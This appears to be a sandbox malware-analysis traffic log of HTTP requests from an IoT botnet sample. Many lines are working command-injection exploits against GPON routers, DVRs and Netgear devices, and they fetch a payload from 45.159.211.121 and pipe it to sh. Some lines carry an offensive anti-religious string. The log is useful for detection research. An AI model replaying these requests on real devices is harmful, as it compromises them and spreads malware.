Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.195Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.128Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 46.30.40.105Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 109.248.201.170Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.128Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.129Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.129Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.195Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.209Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.209Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.145Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.162Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.194Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 159.69.115.63Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.196.247Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 92.53.96.137Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.57.213Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 5.157.87.204Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 95.188.104.7Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 172.67.167.8Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 37.230.114.67Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.108.126Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.158.165.76Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 87.236.16.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.198.215Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.130.251.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.165Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.84.89Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.188.239.74Connection: close
